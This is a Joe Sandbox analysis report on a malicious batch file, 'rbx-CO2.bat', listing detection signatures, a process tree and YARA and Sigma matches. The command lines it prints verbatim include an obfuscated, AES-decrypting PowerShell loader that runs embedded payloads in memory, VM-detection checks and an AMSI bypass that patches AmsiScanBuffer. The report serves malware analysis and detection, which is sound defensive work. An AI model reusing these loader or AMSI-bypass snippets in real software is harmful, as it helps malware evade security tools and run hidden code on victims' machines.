Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
rbx-CO2.bat

Overview

General Information

Sample name:rbx-CO2.bat
Analysis ID:1524982
MD5:d1324a085a54c035d136f7a73edec440
SHA1:3049e422f937395d1d64e205ce5978182d3c2388
SHA256:6a25d0ca74a29596a0c09f26acbe9f85a46d5c1c886a6860dc915d94ffbbbe5a
Tags:azure-winsecure-combatuser-smica83
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Suricata IDS alerts for network traffic
.NET source code contains process injector
.NET source code references suspicious native API functions
AI detected suspicious sample
Contains functionality to compare user and computer (likely to detect sandboxes)
Contains functionality to inject code into remote processes
Creates a thread in another existing process (thread injection)
Creates an autostart registry key pointing to binary in C:\Windows
Creates autostart registry keys with suspicious names
Creates autostart registry keys with suspicious values (likely registry only malware)
Found large BAT file
Found suspicious powershell code related to unpacking or dynamic code loading
Hides that the sample has been downloaded from the Internet (zone.identifier)
Hides threads from debuggers
Hooks files or directories query functions (used to hide files and directories)
Hooks processes query functions (used to hide processes)
Hooks registry keys query functions (used to hide registry keys)
Injects a PE file into a foreign processes
Injects code into the Windows Explorer (explorer.exe)
Installs a global keyboard hook
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Obfuscated command line found
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Sets debug register (to hijack the execution of another thread)
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Potential WinAPI Calls Via CommandLine
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Powerup Write Hijack DLL
Suspicious command line found
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (may stop execution after accessing registry keys)
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Suspicious Powershell In Registry Run Keys
Sigma detected: Uncommon Svchost Parent Process
Stores large binary data to the registry
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

Process Tree

  • System is w10x64
  • cmd.exe (PID: 6824 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\rbx-CO2.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 6248 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • WMIC.exe (PID: 1336 cmdline: wmic diskdrive get Model MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
    • findstr.exe (PID: 3192 cmdline: findstr /i /c:"DADY HARDDISK" /c:"WDS100T2B0A" /c:"QEMU HARDDISK" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)
    • WMIC.exe (PID: 356 cmdline: wmic diskdrive get Manufacturer,Model MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
    • findstr.exe (PID: 1804 cmdline: findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)
    • cmd.exe (PID: 7116 cmdline: cmd.exe /c echo function Rgueq($eXEDy){ $HKJEc=[System.Security.Cryptography.Aes]::Create(); $HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC; $HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $HKJEc.Key=[System.Convert]::FromBase64String('/Ali2v8PJeAtW7Ez9DIBWBzxD0zIlyoV/CL0FcnA0lQ='); $HKJEc.IV=[System.Convert]::FromBase64String('VZVM+EzOQl4yXpCtgZwmdA=='); $HipTi=$HKJEc.CreateDecryptor(); $ioqgE=$HipTi.TransformFinalBlock($eXEDy, 0, $eXEDy.Length); $HipTi.Dispose(); $HKJEc.Dispose(); $ioqgE;}function qVeuI($eXEDy){ Invoke-Expression '$Vcvep=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$eXEDy);'.Replace('blck', ''); Invoke-Expression '$MxJbU=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$mnyLH=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($Vcvep, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $mnyLH.CopyTo($MxJbU); $mnyLH.Dispose(); $Vcvep.Dispose(); $MxJbU.Dispose(); $MxJbU.ToArray();}function cOeZm($eXEDy,$gMyOP){ Invoke-Expression '$ucFsW=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$eXEDy);'.Replace('blck', ''); Invoke-Expression '$tEhqK=$ucFsW.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$tEhqK.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gMyOP)blck;'.Replace('blck', '');}$tVqDd = 'C:\Users\user\Desktop\rbx-CO2.bat';$host.UI.RawUI.WindowTitle = $tVqDd;$kJvvr=[System.IO.File]::ReadAllText($tVqDd).Split([Environment]::NewLine);foreach ($ghynT in $kJvvr) { if ($ghynT.StartsWith(':: ')) { $EnVTr=$ghynT.Substring(3); break; }}$ULNbJ=[string[]]$EnVTr.Split('\');Invoke-Expression '$hDTZf=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[0])));'.Replace('blck', '');Invoke-Expression '$TIMGz=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[1])));'.Replace('blck', '');cOeZm $hDTZf (,[string[]] (''));cOeZm $TIMGz (,[string[]] ('')); MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • powershell.exe (PID: 6444 cmdline: powershell.exe -WindowStyle Hidden MD5: 04029E121A0CFA5991749937DD22A1D9)
      • WerFault.exe (PID: 5660 cmdline: C:\Windows\system32\WerFault.exe -u -p 6444 -s 2396 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
      • cmd.exe (PID: 3000 cmdline: "C:\Windows\System32\cmd.exe" /C echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden | powershell.exe -WindowStyle Hidden MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 1780 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • cmd.exe (PID: 4140 cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • powershell.exe (PID: 2244 cmdline: powershell.exe -WindowStyle Hidden MD5: 04029E121A0CFA5991749937DD22A1D9)
          • cmd.exe (PID: 5608 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Windows\$rbx-onimai2\$rbx-CO2.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 5552 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • WMIC.exe (PID: 3804 cmdline: wmic diskdrive get Model MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
            • findstr.exe (PID: 2976 cmdline: findstr /i /c:"DADY HARDDISK" /c:"WDS100T2B0A" /c:"QEMU HARDDISK" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)
            • WMIC.exe (PID: 2432 cmdline: wmic diskdrive get Manufacturer,Model MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
            • findstr.exe (PID: 4232 cmdline: findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)
            • cmd.exe (PID: 5560 cmdline: cmd.exe /c echo function Rgueq($eXEDy){ $HKJEc=[System.Security.Cryptography.Aes]::Create(); $HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC; $HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $HKJEc.Key=[System.Convert]::FromBase64String('/Ali2v8PJeAtW7Ez9DIBWBzxD0zIlyoV/CL0FcnA0lQ='); $HKJEc.IV=[System.Convert]::FromBase64String('VZVM+EzOQl4yXpCtgZwmdA=='); $HipTi=$HKJEc.CreateDecryptor(); $ioqgE=$HipTi.TransformFinalBlock($eXEDy, 0, $eXEDy.Length); $HipTi.Dispose(); $HKJEc.Dispose(); $ioqgE;}function qVeuI($eXEDy){ Invoke-Expression '$Vcvep=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$eXEDy);'.Replace('blck', ''); Invoke-Expression '$MxJbU=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$mnyLH=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($Vcvep, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $mnyLH.CopyTo($MxJbU); $mnyLH.Dispose(); $Vcvep.Dispose(); $MxJbU.Dispose(); $MxJbU.ToArray();}function cOeZm($eXEDy,$gMyOP){ Invoke-Expression '$ucFsW=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$eXEDy);'.Replace('blck', ''); Invoke-Expression '$tEhqK=$ucFsW.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$tEhqK.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gMyOP)blck;'.Replace('blck', '');}$tVqDd = 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat';$host.UI.RawUI.WindowTitle = $tVqDd;$kJvvr=[System.IO.File]::ReadAllText($tVqDd).Split([Environment]::NewLine);foreach ($ghynT in $kJvvr) { if ($ghynT.StartsWith(':: ')) { $EnVTr=$ghynT.Substring(3); break; }}$ULNbJ=[string[]]$EnVTr.Split('\');Invoke-Expression '$hDTZf=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[0])));'.Replace('blck', '');Invoke-Expression '$TIMGz=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[1])));'.Replace('blck', '');cOeZm $hDTZf (,[string[]] (''));cOeZm $TIMGz (,[string[]] ('')); MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • powershell.exe (PID: 7088 cmdline: powershell.exe -WindowStyle Hidden MD5: 04029E121A0CFA5991749937DD22A1D9)
              • WerFault.exe (PID: 1804 cmdline: C:\Windows\system32\WerFault.exe -u -p 7088 -s 2212 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
              • WerFault.exe (PID: 2680 cmdline: C:\Windows\system32\WerFault.exe -u -p 7088 -s 2104 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
              • schtasks.exe (PID: 3804 cmdline: "C:\Windows\System32\schtasks.exe" /Delete /TN "$rbx-CNT1" /F MD5: 76CD6626DD8834BD4A42E6A565104DC2)
                • conhost.exe (PID: 2976 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • powershell.exe (PID: 4044 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
                • conhost.exe (PID: 5660 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                • powershell.exe (PID: 4000 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
                • powershell.exe (PID: 6936 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
  • powershell.exe (PID: 640 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:thuUFdhjXkHq{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$yFLwIFejWheBPy,[Parameter(Position=1)][Type]$NxINIPbKxv)$yMLVqpDcpHk=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+'e'+''+[Char](102)+''+'l'+''+[Char](101)+'ct'+[Char](101)+'d'+'D'+''+[Char](101)+''+[Char](108)+'e'+[Char](103)+'a'+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+''+[Char](110)+''+'M'+''+[Char](101)+''+[Char](109)+''+'o'+''+[Char](114)+'y'+[Char](77)+''+[Char](111)+''+[Char](100)+''+[Char](117)+''+[Char](108)+''+[Char](101)+'',$False).DefineType(''+[Char](77)+''+[Char](121)+''+[Char](68)+''+[Char](101)+''+[Char](108)+''+[Char](101)+'g'+[Char](97)+''+[Char](116)+''+[Char](101)+'T'+[Char](121)+''+[Char](112)+''+[Char](101)+'',''+[Char](67)+''+[Char](108)+'a'+'s'+'s'+[Char](44)+''+[Char](80)+''+'u'+''+[Char](98)+'l'+[Char](105)+''+[Char](99)+','+[Char](83)+''+[Char](101)+''+[Char](97)+''+'l'+''+'e'+''+[Char](100)+''+[Char](44)+'A'+[Char](110)+''+[Char](115)+'i'+[Char](67)+'l'+[Char](97)+''+'s'+''+'s'+''+','+''+[Char](65)+''+[Char](117)+'t'+[Char](111)+''+[Char](67)+''+'l'+''+[Char](97)+''+[Char](115)+''+'s'+'',[MulticastDelegate]);$yMLVqpDcpHk.DefineConstructor(''+[Char](82)+''+[Char](84)+''+'S'+''+'p'+''+[Char](101)+''+'c'+''+[Char](105)+''+[Char](97)+''+'l'+''+[Char](78)+''+[Char](97)+''+[Char](109)+'e,'+'H'+''+'i'+''+[Char](100)+''+'e'+''+[Char](66)+''+'y'+'S'+[Char](105)+''+'g'+''+','+''+[Char](80)+'u'+[Char](98)+''+'l'+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$yFLwIFejWheBPy).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+'n'+''+[Char](116)+''+[Char](105)+'me,M'+[Char](97)+''+'n'+''+'a'+''+[Char](103)+''+'e'+'d');$yMLVqpDcpHk.DefineMethod(''+'I'+''+'n'+'v'+[Char](111)+'k'+[Char](101)+'',''+'P'+''+'u'+''+'b'+'li'+'c'+''+','+''+'H'+''+[Char](105)+''+[Char](100)+'e'+[Char](66)+'y'+'S'+''+[Char](105)+''+'g'+''+[Char](44)+''+[Char](78)+''+'e'+''+'w'+''+[Char](83)+''+'l'+'o'+[Char](116)+','+'V'+''+[Char](105)+''+[Char](114)+''+'t'+''+[Char](117)+''+'a'+''+[Char](108)+'',$NxINIPbKxv,$yFLwIFejWheBPy).SetImplementationFlags(''+[Char](82)+'unt'+[Char](105)+''+[Char](109)+''+[Char](101)+''+','+''+[Char](77)+''+'a'+''+'n'+'a'+[Char](103)+''+'e'+''+[Char](100)+'');Write-Output $yMLVqpDcpHk.CreateType();}$tBOzPEeXdclpo=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+[Char](121)+'st'+'e'+''+'m'+''+'.'+''+[Char](100)+'l'+'l'+'')}).GetType(''+[Char](77)+'icr'+'o'+''+'s'+''+'o'+''+[Char](102)+''+[Char](116)+''+[Char](46)+''+'W'+''+[Char](105)+'n'+[Char](51)+''+'2'+''+[Char](46)+''+[Char](85)+''+[Char](110)+''+[Char](115)+'af'+[Char](101)+''+[Char](78)+'a'+[Char](116)+''+'i'+''+'v'+''+'e'+'Met'+[Char](104)+''+'o'+''+[Char](100)+''+[Char](115)+'');$YOhLAkBIOfDYUh=$tBOzPEeXdclpo.GetMethod(''+'G'+''+[Char](101)+''+[Char](116)+''+'P'+''+'r'+''+'o'+''+[Char](99)+'A'+'d'+''+[Char](100)+'re'+'s'+''+[Char](115)+'',[Reflection.BindingFlags]('Pu'+[Char](98)+'l'+'i'+'c'+[Char](44)+''+[Char](83)+''+[Char](116)+''+[Char](97)+''+'t'+'i'+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$DyGxdRsDFLitOyBSDtJ=thuUFdhjXkHq @([String])([IntPtr]);$xwWcsbJiItNzaRumjCNQuH=thuUFdhjXkHq @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$poeTVxHWVZq=$tBOzPEeXdclpo.GetMethod(''+'G'+''+'e'+''+'t'+'M'+'o'+'d'+[Char](117)+'l'+'e'+''+'H'+''+'a'+''+[Char](110)+''+[Char](100)+''+[Char](108)+''+[Char](101)+'').Invoke($Null,@([Object](''+[Char](107)+''+[Char](101)+''+[Char](114)+''+[Char](110)+''+[Char](101)+''+[Char](108)+''+[Char](51)+''+[Char](50)+''+[Char](46)+''+'d'+''+[Char](108)+''+'l'+'')));$HcKZyefBJpvKrT=$YOhLAkBIOfDYUh.Invoke($Null,@([Object]$poeTVxHWVZq,[Object](''+[Char](76)+''+[Char](111)+''+[Char](97)+'d'+[Char](76)+''+'i'+''+[Char](98)+''+'r'+''+[Char](97)+''+[Char](114)+''+'y'+''+[Char](65)+'')));$nXtMNPKuSorvJxsIp=$YOhLAkBIOfDYUh.Invoke($Null,@([Object]$poeTVxHWVZq,[Object](''+[Char](86)+''+[Char](105)+''+[Char](114)+''+'t'+''+[Char](117)+''+[Char](97)+''+[Char](108)+''+[Char](80)+''+'r'+''+[Char](111)+''+'t'+''+[Char](101)+''+[Char](99)+''+[Char](116)+'')));$XeqQGMF=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($HcKZyefBJpvKrT,$DyGxdRsDFLitOyBSDtJ).Invoke(''+[Char](97)+''+'m'+''+'s'+''+'i'+''+'.'+''+'d'+''+[Char](108)+''+[Char](108)+'');$IPJIfzrUhQjJlmTUH=$YOhLAkBIOfDYUh.Invoke($Null,@([Object]$XeqQGMF,[Object](''+[Char](65)+'ms'+[Char](105)+''+'S'+''+'c'+'an'+[Char](66)+''+[Char](117)+'ffe'+[Char](114)+'')));$GrxNgCPqmZ=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($nXtMNPKuSorvJxsIp,$xwWcsbJiItNzaRumjCNQuH).Invoke($IPJIfzrUhQjJlmTUH,[uint32]8,4,[ref]$GrxNgCPqmZ);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$IPJIfzrUhQjJlmTUH,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($nXtMNPKuSorvJxsIp,$xwWcsbJiItNzaRumjCNQuH).Invoke($IPJIfzrUhQjJlmTUH,[uint32]8,0x20,[ref]$GrxNgCPqmZ);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('S'+'O'+''+'F'+''+'T'+'W'+'A'+''+[Char](82)+''+'E'+'').GetValue(''+[Char](36)+''+'r'+''+[Char](98)+''+[Char](120)+''+[Char](45)+'s'+[Char](116)+''+'a'+''+'g'+'e'+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 5828 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • dllhost.exe (PID: 6400 cmdline: C:\Windows\System32\dllhost.exe /Processid:{8d1ed557-2027-497c-a325-29d4d11b1321} MD5: 08EB78E5BE019DF044C26B14703BD1FA)
      • winlogon.exe (PID: 560 cmdline: winlogon.exe MD5: F8B41A1B3E569E7E6F990567F21DCE97)
      • lsass.exe (PID: 652 cmdline: C:\Windows\system32\lsass.exe MD5: A1CC00332BBF370654EE3DC8CDC8C95A)
      • svchost.exe (PID: 928 cmdline: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • dwm.exe (PID: 996 cmdline: "dwm.exe" MD5: 5C27608411832C5B39BA04E33D53536C)
      • svchost.exe (PID: 436 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 376 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 60 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 980 cmdline: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1064 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1140 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1192 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1248 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1328 cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1344 cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s nsi MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1356 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1448 cmdline: C:\Windows\system32\svchost.exe -k LocalService -p MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1496 cmdline: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1516 cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1560 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1640 cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s FontCache MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • Conhost.exe (PID: 7680 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • Conhost.exe (PID: 7928 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
Process Memory Space: powershell.exe PID: 6444INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
  • 0x439282:$b2: ::FromBase64String(
  • 0x4392e0:$b2: ::FromBase64String(
  • 0x4b1ee4:$b2: ::FromBase64String(
  • 0x4b32f3:$b2: ::FromBase64String(
  • 0x43358a:$s1: -join
  • 0x4bfbcc:$s1: -join
  • 0x4c47b3:$s1: -join
  • 0x50e1c7:$s1: -join
  • 0x51b29c:$s1: -join
  • 0x51e66e:$s1: -join
  • 0x51ed20:$s1: -join
  • 0x520811:$s1: -join
  • 0x522a17:$s1: -join
  • 0x52323e:$s1: -join
  • 0x523aae:$s1: -join
  • 0x5241e9:$s1: -join
  • 0x52421b:$s1: -join
  • 0x524263:$s1: -join
  • 0x524282:$s1: -join
  • 0x524ad2:$s1: -join
  • 0x524c4e:$s1: -join
Process Memory Space: powershell.exe PID: 7088INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
  • 0x52:$b2: ::FromBase64String(
  • 0x7db02:$b2: ::FromBase64String(
  • 0x9efa1:$b2: ::FromBase64String(
  • 0x9efff:$b2: ::FromBase64String(
  • 0x996c4:$s1: -join
  • 0xd397b:$s1: -join
  • 0xd425f:$s1: -join
  • 0x8f109:$s3: Reverse
  • 0x940f9:$s4: +=
  • 0x9419b:$s4: +=
  • 0x978e3:$s4: +=
  • 0x99399:$s4: +=
  • 0x995af:$s4: +=
  • 0x996a6:$s4: +=
  • 0xce7d5:$s4: +=
  • 0xce7f4:$s4: +=
  • 0xce82f:$s4: +=
  • 0xce84c:$s4: +=
  • 0xce887:$s4: +=
  • 0xce8f3:$s4: +=
  • 0xce97f:$s4: +=

Sigma Signatures

System Summary

barindex
Sigma detected: Base64 Encoded PowerShell Command Detected
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: cmd.exe /c echo function Rgueq($eXEDy){ $HKJEc=[System.Security.Cryptography.Aes]::Create(); $HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC; $HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $HKJEc.Key=[System.Convert]::FromBase64String('/Ali2v8PJeAtW7Ez9DIBWBzxD0zIlyoV/CL0FcnA0lQ='); $HKJEc.IV=[System.Convert]::FromBase64String('VZVM+EzOQl4yXpCtgZwmdA=='); $HipTi=$HKJEc.CreateDecryptor(); $ioqgE=$HipTi.TransformFinalBlock($eXEDy, 0, $eXEDy.Length); $HipTi.Dispose(); $HKJEc.Dispose(); $ioqgE;}function qVeuI($eXEDy){ Invoke-Expression '$Vcvep=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$eXEDy);'.Replace('blck', ''); Invoke-Expression '$MxJbU=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); 